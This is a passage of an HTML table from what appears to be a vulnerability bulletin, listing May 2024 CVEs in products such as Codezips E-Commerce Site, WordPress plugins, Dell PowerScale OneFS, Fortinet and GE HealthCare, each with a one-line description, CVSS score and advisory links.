<td>A vulnerability has been found in Codezips E-Commerce Site 1.0 and classified as critical. This vulnerability affects unknown code of the file admin/addproduct.php. The manipulation of the argument profilepic leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264460.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4923&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4923" target="_blank">CVE-2024-4923</a><br><a href="https://github.com/polaris0x1/CVE/issues/1" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264460" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264460" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333874" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Codezips--E-Commerce Site<br> </td>
<td>A vulnerability, which was classified as critical, has been found in Codezips E-Commerce Site 1.0. Affected by this issue is some unknown functionality of the file admin/editproduct.php. The manipulation of the argument profilepic leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-264746 is the identifier assigned to this vulnerability.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-5049&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5049" target="_blank">CVE-2024-5049</a><br><a href="https://github.com/polaris0x1/CVE/issues/2" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264746" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264746" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.335838" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Cozmoslabs, Razvan Mocanu, Madalin Ungureanu, Cristophor Hurduban--TranslatePress<br> </td>
<td>Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs, Razvan Mocanu, Madalin Ungureanu, Cristophor Hurduban TranslatePress.This issue affects TranslatePress: from n/a through 2.7.5.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34827&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34827" target="_blank">CVE-2024-34827</a><br><a href="https://patchstack.com/database/vulnerability/translatepress-multilingual/wordpress-translate-multilingual-sites-translatepress-plugin-2-7-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Cozmoslabs--Profile Builder<br> </td>
<td>Insufficient Verification of Data Authenticity vulnerability in Cozmoslabs Profile Builder allows Functionality Bypass.This issue affects Profile Builder: from n/a through 3.11.2.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31341&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31341" target="_blank">CVE-2024-31341</a><br><a href="https://patchstack.com/database/vulnerability/profile-builder/wordpress-user-profile-builder-plugin-3-11-2-bypass-vulnerability-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Creative Motion--Clearfy Cache<br> </td>
<td>Cross-Site Request Forgery (CSRF) vulnerability in Creative Motion Clearfy Cache.This issue affects Clearfy Cache: from n/a through 2.2.1.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34806&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34806" target="_blank">CVE-2024-34806</a><br><a href="https://patchstack.com/database/vulnerability/clearfy/wordpress-clearfy-cache-plugin-2-2-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>CriticalMoments--CMSaasStarter<br> </td>
<td>CMSaaSStarter is a SaaS template/boilerplate built with SvelteKit, Tailwind, and Supabase. Any forks of the CMSaaSStarter template before commit 7904d416d2c72ec75f42fbf51e9e64fa74062ee6 are impacted. The issue is the user JWT Token is not verified on server session. You should take the patch 7904d416d2c72ec75f42fbf51e9e64fa74062ee6 into your fork.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34354&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34354" target="_blank">CVE-2024-34354</a><br><a href="https://github.com/CriticalMoments/CMSaasStarter/commit/7904d416d2c72ec75f42fbf51e9e64fa74062ee6" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/CriticalMoments/CMSaasStarter/pull/65" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/CriticalMoments/CMSaasStarter/security/advisories/GHSA-qgcj-9rxf-rw7q" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>CyberPower--PowerPanel business<br> </td>
<td>Certain MQTT wildcards are not blocked on the CyberPower PowerPanel system, which might result in an attacker obtaining data from throughout the system after gaining access to any device.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31409&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31409" target="_blank">CVE-2024-31409</a><br><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-24-123-01" target="_blank">ics-cert@hq.dhs.gov</a><br><a href="https://www.cyberpower.com/global/en/product/sku/powerpanel_business_for_windows#downloads" target="_blank">ics-cert@hq.dhs.gov</a></td>
</tr>
<tr>
<td>CyberPower--PowerPanel business<br> </td>
<td>The key used to encrypt passwords stored in the database can be found in the CyberPower PowerPanel application code, allowing the passwords to be recovered.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32042&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">4.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32042" target="_blank">CVE-2024-32042</a><br><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-24-123-01" target="_blank">ics-cert@hq.dhs.gov</a><br><a href="https://www.cyberpower.com/global/en/product/sku/powerpanel_business_for_windows#downloads" target="_blank">ics-cert@hq.dhs.gov</a></td>
</tr>
<tr>
<td>Dassault Systmes--3DSwymer<br> </td>
<td>A stored Cross-site Scripting (XSS) vulnerability affecting 3DDashboard in 3DSwymer from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2024x allows an attacker to execute arbitrary script code.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-5597&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">5.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-5597" target="_blank">CVE-2023-5597</a><br><a href="https://www.3ds.com/vulnerability/advisories" target="_blank">3DS.Information-Security@3ds.com</a></td>
</tr>
<tr>
<td>Dell--PowerScale OneFS<br> </td>
<td>Dell PowerScale OneFS versions 8.2.x through 9.7.0.2 contains an external control of file name or path vulnerability. A local high privilege attacker could potentially exploit this vulnerability, leading to denial of service.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-25965&amp;vector=CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:L/I:H/A:H" target="_blank" title="CVSS V3 Score">6.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-25965" target="_blank">CVE-2024-25965</a><br><a href="https://www.dell.com/support/kbdoc/en-us/000224860/dsa-2024-163-security-update-for-dell-powerscale-onefs-for-multiple-security-vulnerabilities" target="_blank">security_alert@emc.com</a></td>
</tr>
<tr>
<td>Dell--PowerScale OneFS<br> </td>
<td>Dell PowerScale OneFS versions 8.2.x through 9.7.0.1 contains an execution with unnecessary privileges vulnerability. A local high privileged attacker could potentially exploit this vulnerability, leading to escalation of privileges.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-25967&amp;vector=CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-25967" target="_blank">CVE-2024-25967</a><br><a href="https://www.dell.com/support/kbdoc/en-us/000224860/dsa-2024-163-security-update-for-dell-powerscale-onefs-for-multiple-security-vulnerabilities" target="_blank">security_alert@emc.com</a></td>
</tr>
<tr>
<td>Dell--PowerScale OneFS<br> </td>
<td>Dell PowerScale OneFS versions 8.2.x through 9.7.0.1 contains an allocation of resources without limits or throttling vulnerability. A local unauthenticated attacker could potentially exploit this vulnerability, leading to denial of service.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-25969&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">6.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-25969" target="_blank">CVE-2024-25969</a><br><a href="https://www.dell.com/support/kbdoc/en-us/000224860/dsa-2024-163-security-update-for-dell-powerscale-onefs-for-multiple-security-vulnerabilities" target="_blank">security_alert@emc.com</a></td>
</tr>
<tr>
<td>Dell--PowerScale OneFS<br> </td>
<td>Dell PowerScale OneFS versions 8.2.x through 9.7.0.1 contains an improper input validation vulnerability. A low privileged remote attacker could potentially exploit this vulnerability, leading to loss of integrity.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-25970&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-25970" target="_blank">CVE-2024-25970</a><br><a href="https://www.dell.com/support/kbdoc/en-us/000224860/dsa-2024-163-security-update-for-dell-powerscale-onefs-for-multiple-security-vulnerabilities" target="_blank">security_alert@emc.com</a></td>
</tr>
<tr>
<td>Dell--PowerScale OneFS<br> </td>
<td>Dell PowerScale OneFS versions 8.2.x through 9.7.0.2 contains an improper handling of unexpected data type vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to denial of service.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-25966&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-25966" target="_blank">CVE-2024-25966</a><br><a href="https://www.dell.com/support/kbdoc/en-us/000224860/dsa-2024-163-security-update-for-dell-powerscale-onefs-for-multiple-security-vulnerabilities" target="_blank">security_alert@emc.com</a></td>
</tr>
<tr>
<td>Dell--PowerScale OneFS<br> </td>
<td>Dell PowerScale OneFS versions 8.2.x through 9.7.0.2 contains a use of a broken or risky cryptographic algorithm vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to information disclosure.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-25968&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-25968" target="_blank">CVE-2024-25968</a><br><a href="https://www.dell.com/support/kbdoc/en-us/000224860/dsa-2024-163-security-update-for-dell-powerscale-onefs-for-multiple-security-vulnerabilities" target="_blank">security_alert@emc.com</a></td>
</tr>
<tr>
<td>Easy Digital Downloads--Easy Digital Downloads<br> </td>
<td>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Easy Digital Downloads.This issue affects Easy Digital Downloads: from n/a through 3.2.11.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32100&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32100" target="_blank">CVE-2024-32100</a><br><a href="https://patchstack.com/database/vulnerability/easy-digital-downloads/wordpress-easy-digital-downloads-plugin-3-2-11-sensitive-data-exposure-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Easy Digital Downloads--Easy Digital Downloads<br> </td>
<td>Cross-Site Request Forgery (CSRF) vulnerability in Easy Digital Downloads.This issue affects Easy Digital Downloads: from n/a through 3.2.11.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31113&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31113" target="_blank">CVE-2024-31113</a><br><a href="https://patchstack.com/database/vulnerability/easy-digital-downloads/wordpress-easy-digital-downloads-plugin-3-2-11-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Elegant Themes--Divi Builder<br> </td>
<td>The Elegant Themes Divi theme, Extra theme, and Divi Page Builder plugin for WordPress are vulnerable to DOM-Based Stored Cross-Site Scripting via the 'title' parameter in versions up to, and including, 4.25.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4490&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4490" target="_blank">CVE-2024-4490</a><br><a href="https://www.elegantthemes.com/" target="_blank">security@wordfence.com</a><br><a href="https://www.elegantthemes.com/api/changelog/divi.txt" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/efac70f6-d959-41f7-bdef-d554f1c9133e?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>EnvoThemes--Envo's Elementor Templates &amp; Widgets for WooCommerce<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in EnvoThemes Envo's Elementor Templates &amp; Widgets for WooCommerce allows Stored XSS.This issue affects Envo's Elementor Templates &amp; Widgets for WooCommerce: from n/a through 1.4.8.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-35167&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35167" target="_blank">CVE-2024-35167</a><br><a href="https://patchstack.com/database/vulnerability/envo-elementor-for-woocommerce/wordpress-envo-s-elementor-templates-widgets-for-woocommerce-plugin-1-4-8-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Eric Alli--Google Typography<br> </td>
<td>Missing Authorization vulnerability in Eric Alli Google Typography.This issue affects Google Typography: from n/a through 1.1.2.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33942&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33942" target="_blank">CVE-2024-33942</a><br><a href="https://patchstack.com/database/vulnerability/google-typography/wordpress-google-typography-plugin-1-1-2-broken-access-control-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Extend Themes--EmpowerWP<br> </td>
<td>Cross-Site Request Forgery (CSRF) vulnerability in Extend Themes EmpowerWP.This issue affects EmpowerWP: from n/a through 1.0.21.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34809&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34809" target="_blank">CVE-2024-34809</a><br><a href="https://patchstack.com/database/vulnerability/empowerwp/wordpress-empowerwp-theme-1-0-21-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Felix Moira--Popup More Popups<br> </td>
<td>Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Felix Moira Popup More Popups allows Stored XSS.This issue affects Popup More Popups: from n/a through 2.3.1.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32800&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32800" target="_blank">CVE-2024-32800</a><br><a href="https://patchstack.com/database/vulnerability/popup-more/wordpress-popup-popup-more-popups-plugin-2-3-1-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Flothemes--Flo Forms<br> </td>
<td>Missing Authorization vulnerability in Flothemes Flo Forms.This issue affects Flo Forms: from n/a through 1.0.42.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-35174&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35174" target="_blank">CVE-2024-35174</a><br><a href="https://patchstack.com/database/vulnerability/flo-forms/wordpress-flo-forms-plugin-1-0-42-broken-access-control-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>FmeAddons--Conditional Checkout Fields for WooCommerce<br> </td>
<td>Missing Authorization vulnerability in FmeAddons Conditional Checkout Fields for WooCommerce.This issue affects Conditional Checkout Fields for WooCommerce: from n/a through 1.2.3.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2022-45070&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2022-45070" target="_blank">CVE-2022-45070</a><br><a href="https://patchstack.com/database/vulnerability/conditional-checkout-fields-for-woocommerce/wordpress-conditional-checkout-fields-for-woocommerce-plugin-1-2-1-broken-authentication-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Fortinet--FortiADC<br> </td>
<td>An exposure of sensitive system information to an unauthorized control sphere vulnerability [CWE-497] in FortiADC version 7.4.1 and below, version 7.2.3 and below, version 7.1.4 and below, version 7.0.5 and below, version 6.2.6 and below may allow a read-only admin to view data pertaining to other admins.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-50180&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-50180" target="_blank">CVE-2023-50180</a><br><a href="https://fortiguard.com/psirt/FG-IR-23-433" target="_blank">psirt@fortinet.com</a></td>
</tr>
<tr>
<td>Fortinet--FortiNAC<br> </td>
<td>An improper neutralization of inputs during web page generation vulnerability [CWE-79] in FortiNAC version 9.4.0 through 9.4.4, 9.2.0 through 9.2.8, 9.1.0 through 9.1.10, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 7.2.0 through 7.2.3 may allow a remote authenticated attacker to perform stored and reflected cross site scripting (XSS) attack via crafted HTTP requests.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31488&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31488" target="_blank">CVE-2024-31488</a><br><a href="https://fortiguard.com/psirt/FG-IR-24-040" target="_blank">psirt@fortinet.com</a></td>
</tr>
<tr>
<td>Fortinet--FortiOS<br> </td>
<td>A double free vulnerability [CWE-415] in Fortinet FortiOS before 7.0.0 may allow a privileged attacker to execute code or commands via crafted HTTP or HTTPs requests.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-44247&amp;vector=CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-44247" target="_blank">CVE-2023-44247</a><br><a href="https://fortiguard.com/psirt/FG-IR-23-195" target="_blank">psirt@fortinet.com</a></td>
</tr>
<tr>
<td>Fortinet--FortiOS<br> </td>
<td>An improper check or handling of exceptional conditions vulnerability [CWE-703] in Fortinet FortiOS version 7.4.1 allows an unauthenticated attacker to provoke a denial of service on the administrative interface via crafted HTTP requests.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-26007&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-26007" target="_blank">CVE-2024-26007</a><br><a href="https://fortiguard.com/psirt/FG-IR-24-017" target="_blank">psirt@fortinet.com</a></td>
</tr>
<tr>
<td>Fortinet--FortiProxy<br> </td>
<td>A use of externally-controlled format string in Fortinet FortiProxy versions 7.2.0 through 7.2.4, 7.0.0 through 7.0.10, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7, FortiPAM versions 1.0.0 through 1.0.3, FortiOS versions 7.2.0, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.16 allows attacker to execute unauthorized code or commands via specially crafted commands</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-36640&amp;vector=CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-36640" target="_blank">CVE-2023-36640</a><br><a href="https://fortiguard.com/psirt/FG-IR-23-137" target="_blank">psirt@fortinet.com</a></td>
</tr>
<tr>
<td>Fortinet--FortiProxy<br> </td>
<td>A use of externally-controlled format string in Fortinet FortiProxy versions 7.2.0 through 7.2.5, 7.0.0 through 7.0.11, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6 FortiPAM versions 1.1.0, 1.0.0 through 1.0.3 FortiOS versions 7.4.0, 7.2.0 through 7.2.5, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15 FortiSwitchManager versions 7.2.0 through 7.2.2, 7.0.0 through 7.0.2 allows attacker to execute unauthorized code or commands via specially crafted cli commands and http requests.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-45583&amp;vector=CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-45583" target="_blank">CVE-2023-45583</a><br><a href="https://fortiguard.com/psirt/FG-IR-23-137" target="_blank">psirt@fortinet.com</a></td>
</tr>
<tr>
<td>Fortinet--FortiProxy<br> </td>
<td>An insufficient verification of data authenticity vulnerability [CWE-345] in Fortinet FortiOS SSL-VPN tunnel mode version 7.4.0 through 7.4.1, version 7.2.0 through 7.2.7 and before 7.0.12 &amp; FortiProxy SSL-VPN tunnel mode version 7.4.0 through 7.4.1, version 7.2.0 through 7.2.7 and before 7.0.13 allows an authenticated VPN user to send (but not receive) packets spoofing the IP of another user via crafted network packets.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-45586&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-45586" target="_blank">CVE-2023-45586</a><br><a href="https://fortiguard.com/psirt/FG-IR-23-225" target="_blank">psirt@fortinet.com</a></td>
</tr>
<tr>
<td>GE HealthCare--EchoPAC Software Only<br> </td>
<td>Non privileged access to critical file vulnerability in GE HealthCare EchoPAC products</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27108&amp;vector=CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27108" target="_blank">CVE-2024-27108</a><br><a href="https://securityupdate.gehealthcare.com/" target="_blank">171caf72-b841-4e04-a68e-93493aff2b94</a></td>
</tr>
<tr>
<td>GE HealthCare--EchoPAC Software Only<br> </td>
<td>Vulnerable data in transit in GE HealthCare EchoPAC products</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27106&amp;vector=CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27106" target="_blank">CVE-2024-27106</a><br><a href="https://securityupdate.gehealthcare.com/" target="_blank">171caf72-b841-4e04-a68e-93493aff2b94</a></td>
</tr>
<tr>
<td>GE HealthCare--Venue<br> </td>
<td>Path traversal vulnerability in "deleteFiles" function of Common Service Desktop, a GE HealthCare ultrasound device component</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-1629&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-1629" target="_blank">CVE-2024-1629</a><br><a href="https://securityupdate.gehealthcare.com/" target="_blank">171caf72-b841-4e04-a68e-93493aff2b94</a></td>
</tr>
<tr>
<td>GZTimeWalker--GZCTF<br> </td>
<td>GZ::CTF is a capture the flag platform. Prior to 0.20.1, unprivileged user can perform cross-site scripting attacks on other users by constructing malicious team names. This problem has been fixed in `v0.20.1`.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34699&amp;vector=CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">6.5</a></td>
